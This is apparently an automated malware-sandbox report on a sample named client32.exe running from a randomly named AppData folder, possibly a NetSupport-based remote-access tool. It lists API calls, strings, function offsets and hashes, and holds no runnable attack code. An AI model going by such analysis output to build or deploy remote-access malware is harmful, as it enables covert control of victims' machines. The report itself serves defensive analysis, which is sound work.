                                                                                                                                                                  • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                                                                                                • CreateWindowExA.USER32(00000000,edit,00000000,40040004,?,?,?,?,?,00000002,00000000,?), ref: 110072F7
                                                                                                                                                                • SetFocus.USER32(?), ref: 11007353
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateFocusWindow_malloc_memsetwsprintf
                                                                                                                                                                • String ID: edit
                                                                                                                                                                • API String ID: 1305092643-2167791130
                                                                                                                                                                APIs
                                                                                                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 11009265
                                                                                                                                                                • _memmove.LIBCMT ref: 110092B6
                                                                                                                                                                  • Part of subcall function 11008D50: std::_Xinvalid_argument.LIBCPMT ref: 11008D6A
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Xinvalid_argumentstd::_$_memmove
                                                                                                                                                                • String ID: string too long
                                                                                                                                                                • API String ID: 2168136238-2556327735
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _malloc
                                                                                                                                                                • String ID: ..\CTL32\uuencode.c$buf
                                                                                                                                                                • API String ID: 1579825452-878823822
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: __wcstoi64
                                                                                                                                                                • String ID: Client$DisableKeys
                                                                                                                                                                • API String ID: 398114495-4218113505
                                                                                                                                                                • Opcode ID: 716cb09b3c2f6d142f2e5688581337e509dd50440af53e8e0f393a2c6f0442b6
                                                                                                                                                                • Instruction ID: 68ded752b5482f5f1f1707e51c7ff90776eef8c426e4aed6d9b84e4704bb1440
                                                                                                                                                                • Opcode Fuzzy Hash: 716cb09b3c2f6d142f2e5688581337e509dd50440af53e8e0f393a2c6f0442b6
                                                                                                                                                                • Instruction Fuzzy Hash: 0121787AF0424616E720CE249D80BAEBBF9AF45708F2440F9DCC987541EE32F506C791
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                                                                                                  • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                                                                                                  • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                                                                                                • std::exception::exception.LIBCMT ref: 1108F38C
                                                                                                                                                                • __CxxThrowException@8.LIBCMT ref: 1108F3A1
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                                                                                                                                • String ID: L
                                                                                                                                                                • API String ID: 1338273076-2909332022
                                                                                                                                                                • Opcode ID: ca3c9e43b94024294cee3a83bd0df657fbb186da9c2071d90ca30164a8257d44
                                                                                                                                                                • Instruction ID: a4fae97c5fdb08f5bbe7be2be84186cb3cec15bbd065a55e87689edd9833ea14
                                                                                                                                                                • Opcode Fuzzy Hash: ca3c9e43b94024294cee3a83bd0df657fbb186da9c2071d90ca30164a8257d44
                                                                                                                                                                • Instruction Fuzzy Hash: E73177B5D04259AFDB10DFA5C880BDEFBF8FB08754F04826DE915A7280D775A904CB51
                                                                                                                                                                APIs
                                                                                                                                                                • std::exception::exception.LIBCMT ref: 11041413
                                                                                                                                                                • __CxxThrowException@8.LIBCMT ref: 11041421
                                                                                                                                                                Strings
                                                                                                                                                                • VolumeControl exception : %hs, xrefs: 11041431
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Exception@8Throwstd::exception::exception
                                                                                                                                                                • String ID: VolumeControl exception : %hs
                                                                                                                                                                • API String ID: 3728558374-910296547
                                                                                                                                                                • Opcode ID: 118abbde1ebe4424435f64918357d89c4207cb987e7db87aca0e3b34d3970159
                                                                                                                                                                • Instruction ID: 3351f46422f9e7833a0dd597507e069f064f33e0319a204fc915276dbd9183a5
                                                                                                                                                                • Opcode Fuzzy Hash: 118abbde1ebe4424435f64918357d89c4207cb987e7db87aca0e3b34d3970159
                                                                                                                                                                • Instruction Fuzzy Hash: A721E775F006059FCF01CF65C890BFEF7E8EB49609FA085A9E81697A40DB35B904CBA1
                                                                                                                                                                APIs
                                                                                                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 1100F27B
                                                                                                                                                                  • Part of subcall function 111603E3: std::exception::exception.LIBCMT ref: 111603F8
                                                                                                                                                                  • Part of subcall function 111603E3: __CxxThrowException@8.LIBCMT ref: 1116040D
                                                                                                                                                                  • Part of subcall function 111603E3: std::exception::exception.LIBCMT ref: 1116041E
                                                                                                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 1100F292
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
                                                                                                                                                                • String ID: string too long
                                                                                                                                                                • API String ID: 963545896-2556327735
                                                                                                                                                                • Opcode ID: 6b1525799c9edef334f4852062e8405e18519a63a5733119385c965e45330704
                                                                                                                                                                • Instruction ID: bb54faa7590d99a912cddc2b6cd1eeb78aa94a45d21c5f83dac251cd0972bc34
                                                                                                                                                                • Opcode Fuzzy Hash: 6b1525799c9edef334f4852062e8405e18519a63a5733119385c965e45330704
                                                                                                                                                                • Instruction Fuzzy Hash: EE119A377046544FE321D99CE880B6AF7E9EF956A4F20066FE59187650C7A1A84483A2
                                                                                                                                                                APIs
                                                                                                                                                                • ShowWindow.USER32(8D111939,00000009,?,?,?,?,?,?,?,?,?,?,110BA3E6,110BFEBC), ref: 110B92CB
                                                                                                                                                                  • Part of subcall function 110B8610: GetSystemMetrics.USER32(0000004C), ref: 110B8642
                                                                                                                                                                  • Part of subcall function 110B8610: GetSystemMetrics.USER32(0000004D), ref: 110B8649
                                                                                                                                                                  • Part of subcall function 110B8610: GetSystemMetrics.USER32(0000004E), ref: 110B8650
                                                                                                                                                                  • Part of subcall function 110B8610: GetSystemMetrics.USER32(0000004F), ref: 110B8657
                                                                                                                                                                  • Part of subcall function 110B8610: SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 110B8666
                                                                                                                                                                  • Part of subcall function 110B8610: GetSystemMetrics.USER32(?), ref: 110B8674
                                                                                                                                                                  • Part of subcall function 110B8610: GetSystemMetrics.USER32(00000001), ref: 110B8683
                                                                                                                                                                • MoveWindow.USER32(8D111939,?,?,?,?,00000001), ref: 110B92F3
                                                                                                                                                                Strings
                                                                                                                                                                • j CB::OnRemoteSizeRestore(%d, %d, %d, %d), xrefs: 110B930D
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: System$Metrics$Window$InfoMoveParametersShow
                                                                                                                                                                • String ID: j CB::OnRemoteSizeRestore(%d, %d, %d, %d)
                                                                                                                                                                • API String ID: 2940908497-693965840
                                                                                                                                                                • Opcode ID: eeba164e39b9a206ee0bd13021fe79c14c8f790cdcea3297abcc58d2d41d4cb3
                                                                                                                                                                • Instruction ID: ea8a17caf2cab53e8fa0eb5ee6ebbdabb1f0cf5c0d35e4c5ce58ed4944f537fe
                                                                                                                                                                • Opcode Fuzzy Hash: eeba164e39b9a206ee0bd13021fe79c14c8f790cdcea3297abcc58d2d41d4cb3
                                                                                                                                                                • Instruction Fuzzy Hash: FF21EA75B0060AAFDB08DFA8C995DBEF7B5FB88304F104668E51997354DA30BD01CBA4
                                                                                                                                                                APIs
                                                                                                                                                                • inet_addr.WSOCK32(00000000,0000003E,?,?), ref: 11049611
                                                                                                                                                                • _free.LIBCMT ref: 11049619
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _freeinet_addr
                                                                                                                                                                • String ID: >
                                                                                                                                                                • API String ID: 1695503834-325317158
                                                                                                                                                                • Opcode ID: dce819e6e19835175f2eb2e805919a9a67d1191bb2d60a9b1a31f8b68dd0af42
                                                                                                                                                                • Instruction ID: 6df48fcaa37723547dabdf7cd208d39f8a2ff7905a2c9ebf3e4832579dd6b0ea
                                                                                                                                                                • Opcode Fuzzy Hash: dce819e6e19835175f2eb2e805919a9a67d1191bb2d60a9b1a31f8b68dd0af42
                                                                                                                                                                • Instruction Fuzzy Hash: 4B21F838D0025B8BDB11DF28D8907D9B7F4FF5A314F6484E9D8C8DB240EA756A89CB91
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 11143C20: GetCurrentProcess.KERNEL32(1102947F,?,11143E73,?), ref: 11143C2C
                                                                                                                                                                  • Part of subcall function 11143C20: GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\bpsFyf\client32.exe,00000104,?,11143E73,?), ref: 11143C49
                                                                                                                                                                • _memmove.LIBCMT ref: 11147211
                                                                                                                                                                Strings
                                                                                                                                                                • Failed to get callstack, xrefs: 111471BD
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CurrentFileModuleNameProcess_memmove
                                                                                                                                                                • String ID: Failed to get callstack
                                                                                                                                                                • API String ID: 4135527288-766476014
                                                                                                                                                                • Opcode ID: 63529710b4138f6f81ad4f3080514690bdb2b876b6fb0115b81c75db0389a908
                                                                                                                                                                • Instruction ID: 4fb2fbc616631b5574b6180649b942946bf04768c5170edb731833e4cde01d29
                                                                                                                                                                • Opcode Fuzzy Hash: 63529710b4138f6f81ad4f3080514690bdb2b876b6fb0115b81c75db0389a908
                                                                                                                                                                • Instruction Fuzzy Hash: D3219875A0011D9BCB14DF64DD94BAEB3B9EF8871CF1041AAEC0DA7240DB31AE54CB90
                                                                                                                                                                APIs
                                                                                                                                                                • _memset.LIBCMT ref: 1106309F
                                                                                                                                                                  • Part of subcall function 1110F4A0: _malloc.LIBCMT ref: 1110F4A9
                                                                                                                                                                  • Part of subcall function 1110F4A0: _memset.LIBCMT ref: 1110F4D2
                                                                                                                                                                • _swscanf.LIBCMT ref: 11063104
                                                                                                                                                                Strings
                                                                                                                                                                • %d %d %d %d %d %d %d %d %d, xrefs: 110630FE
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _memset$_malloc_swscanf
                                                                                                                                                                • String ID: %d %d %d %d %d %d %d %d %d
                                                                                                                                                                • API String ID: 226140750-2123045714
                                                                                                                                                                • Opcode ID: 4711e5a1c1c86c382dbc854a19b4131db48f5f8086dc55bfce866748364dfc87
                                                                                                                                                                • Instruction ID: 298e6396b29eeabd8d352511c8cf028c9fd899b3f0ddf6bd5fc34ff26e9d1feb
                                                                                                                                                                • Opcode Fuzzy Hash: 4711e5a1c1c86c382dbc854a19b4131db48f5f8086dc55bfce866748364dfc87
                                                                                                                                                                • Instruction Fuzzy Hash: 89117F76500205ABD721CA55CCC0EEB77FCEF89758B004919F64A8B540E671F958C7A1
                                                                                                                                                                APIs
                                                                                                                                                                • RegQueryValueExA.ADVAPI32(00020019,?,00000000,59FD48C0,00000000,00020019,?,00000000), ref: 110ED280
                                                                                                                                                                  • Part of subcall function 110ECF40: wvsprintfA.USER32(?,00020019,?), ref: 110ECF6B
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: QueryValuewvsprintf
                                                                                                                                                                • String ID: ($Error %d getting %s
                                                                                                                                                                • API String ID: 141982866-3697087921
                                                                                                                                                                • Opcode ID: ef2d7f3509dbd67b9f71e6e81423e7131c7de3edf52ba7e7570321b23b06e68c
                                                                                                                                                                • Instruction ID: 38ad67af7cf9c35c8db4f97e6700948d2d14c8bc089a0f5a48db9c7a16624884
                                                                                                                                                                • Opcode Fuzzy Hash: ef2d7f3509dbd67b9f71e6e81423e7131c7de3edf52ba7e7570321b23b06e68c
                                                                                                                                                                • Instruction Fuzzy Hash: 7011A372E01118AFDB00DEA9DD45DEFB3B8EB94225F00816EF81597140DA71E914C761
                                                                                                                                                                APIs
                                                                                                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 1115B955
                                                                                                                                                                  • Part of subcall function 111603E3: std::exception::exception.LIBCMT ref: 111603F8
                                                                                                                                                                  • Part of subcall function 111603E3: __CxxThrowException@8.LIBCMT ref: 1116040D
                                                                                                                                                                  • Part of subcall function 111603E3: std::exception::exception.LIBCMT ref: 1116041E
                                                                                                                                                                • _memmove.LIBCMT ref: 1115B980
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                                                                                                • String ID: vector<T> too long
                                                                                                                                                                • API String ID: 1785806476-3788999226
                                                                                                                                                                • Opcode ID: 985b4cd0e0fd15946b68da0742ad1020d4f93cb3bda519e3b04a38a12266c9a7
                                                                                                                                                                • Instruction ID: 9bd9c4d6588b1437e362be7874788b73cfe0ef9cc3fbeba8d3f25e101c44f04d
                                                                                                                                                                • Opcode Fuzzy Hash: 985b4cd0e0fd15946b68da0742ad1020d4f93cb3bda519e3b04a38a12266c9a7
                                                                                                                                                                • Instruction Fuzzy Hash: 360152B56006069FD754CE6DDD808ABF7EDEF843543548A2DE5AA87644EA70B804CBA0
                                                                                                                                                                Strings
                                                                                                                                                                • Error. preventing capbuf overflow, xrefs: 1100B596
                                                                                                                                                                • Error. NULL capbuf, xrefs: 1100B571
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: Error. NULL capbuf$Error. preventing capbuf overflow
                                                                                                                                                                • API String ID: 0-3856134272
                                                                                                                                                                • Opcode ID: 1f0c2c9f5a07f47820da7e35dc7bdef2141c31e2dc16fbdf152bb29d9c040303
                                                                                                                                                                • Instruction ID: 72194ce60bb210f9c79eab4ff39d038ff42eb9fd150cdda041a13f8a69250570
                                                                                                                                                                • Opcode Fuzzy Hash: 1f0c2c9f5a07f47820da7e35dc7bdef2141c31e2dc16fbdf152bb29d9c040303
                                                                                                                                                                • Instruction Fuzzy Hash: DA01DBBEE0060997DB10CE65E840ADBB398DBC037DF04897AFA1E93501E671F5918792
                                                                                                                                                                APIs
                                                                                                                                                                • wvsprintfA.USER32(?,?,00000000), ref: 110D1322
                                                                                                                                                                  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorExitLastMessageProcesswsprintfwvsprintf
                                                                                                                                                                • String ID: ..\CTL32\NSMString.cpp$pszBuffer[1024]==0
                                                                                                                                                                • API String ID: 175691280-2052047905
                                                                                                                                                                • Opcode ID: 5efc2b1b499c19e22c0b11ea56c1799b84258173eef5baac531c406e2266982d
                                                                                                                                                                • Instruction ID: 2d49a6c718824c4fb39b7936eb355b27ab8e956fb5db8f47369f869790572c39
                                                                                                                                                                • Opcode Fuzzy Hash: 5efc2b1b499c19e22c0b11ea56c1799b84258173eef5baac531c406e2266982d
                                                                                                                                                                • Instruction Fuzzy Hash: 91F0F979B0021D6BCB01DFA4DC50BFEBBFC9B45208F044099EA04A7240DE706A05C7A5
                                                                                                                                                                APIs
                                                                                                                                                                • wvsprintfA.USER32(?,?,1102C511), ref: 110D139B
                                                                                                                                                                  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorExitLastMessageProcesswsprintfwvsprintf
                                                                                                                                                                • String ID: ..\CTL32\NSMString.cpp$pszBuffer[1024]==0
                                                                                                                                                                • API String ID: 175691280-2052047905
                                                                                                                                                                APIs
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,ConvertStringSecurityDescriptorToSecurityDescriptorA), ref: 1109D404
                                                                                                                                                                • SetLastError.KERNEL32(00000078,00000000,?,1109E29C,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109D42D
                                                                                                                                                                Strings
                                                                                                                                                                • ConvertStringSecurityDescriptorToSecurityDescriptorA, xrefs: 1109D3FE
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressErrorLastProc
                                                                                                                                                                • String ID: ConvertStringSecurityDescriptorToSecurityDescriptorA
                                                                                                                                                                • API String ID: 199729137-262600717
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,11026ED0,00000000,00000000,00000000), ref: 110291BE
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateThread__wcstoi64
                                                                                                                                                                • String ID: *TapiFixPeriod$Bridge
                                                                                                                                                                • API String ID: 1152747075-2058455932
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 11089280: UnhookWindowsHookEx.USER32(?), ref: 110892A3
                                                                                                                                                                • timeBeginPeriod.WINMM(00000001), ref: 110B757B
                                                                                                                                                                  • Part of subcall function 1110F340: SetEvent.KERNEL32(00000000,?,1102C44F), ref: 1110F364
                                                                                                                                                                  • Part of subcall function 110B73D0: WaitForSingleObject.KERNEL32(?,000000FA,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B743D
                                                                                                                                                                  • Part of subcall function 1110F370: SetEvent.KERNEL32(?,?,1102C684), ref: 1110F37B
                                                                                                                                                                  • Part of subcall function 1110F370: PulseEvent.KERNEL32(00000244,?,1102C684), ref: 1110F38E
                                                                                                                                                                • timeEndPeriod.WINMM(00000001), ref: 110B75A3
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Event$Periodtime$BeginHookObjectPulseSingleUnhookWaitWindows
                                                                                                                                                                • String ID: NewScrape
                                                                                                                                                                • API String ID: 763200252-2412895908
                                                                                                                                                                APIs
                                                                                                                                                                • GetProcAddress.KERNEL32(?,ProcessIdToSessionId), ref: 110315E4
                                                                                                                                                                • SetLastError.KERNEL32(00000078), ref: 11031605
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressErrorLastProc
                                                                                                                                                                • String ID: ProcessIdToSessionId
                                                                                                                                                                • API String ID: 199729137-2164408197
                                                                                                                                                                APIs
                                                                                                                                                                • SendDlgItemMessageA.USER32(?,?,?,?,?), ref: 110010B7
                                                                                                                                                                  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                Strings
                                                                                                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001091
                                                                                                                                                                • m_hWnd, xrefs: 11001096
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Message$ErrorExitItemLastProcessSendwsprintf
                                                                                                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                • API String ID: 2046328329-2830328467
                                                                                                                                                                APIs
                                                                                                                                                                • SendMessageA.USER32(?,?,?,?), ref: 11001073
                                                                                                                                                                  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                Strings
                                                                                                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001051
                                                                                                                                                                • m_hWnd, xrefs: 11001056
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                • API String ID: 819365019-2830328467
                                                                                                                                                                APIs
                                                                                                                                                                • PostMessageA.USER32(?,?,?,?), ref: 11001103
                                                                                                                                                                  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                Strings
                                                                                                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110010E1
                                                                                                                                                                • m_hWnd, xrefs: 110010E6
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Message$ErrorExitLastPostProcesswsprintf
                                                                                                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                • API String ID: 906220102-2830328467
                                                                                                                                                                APIs
                                                                                                                                                                • KillTimer.USER32(?,?), ref: 110154CB
                                                                                                                                                                  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                Strings
                                                                                                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110154B1
                                                                                                                                                                • m_hWnd, xrefs: 110154B6
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
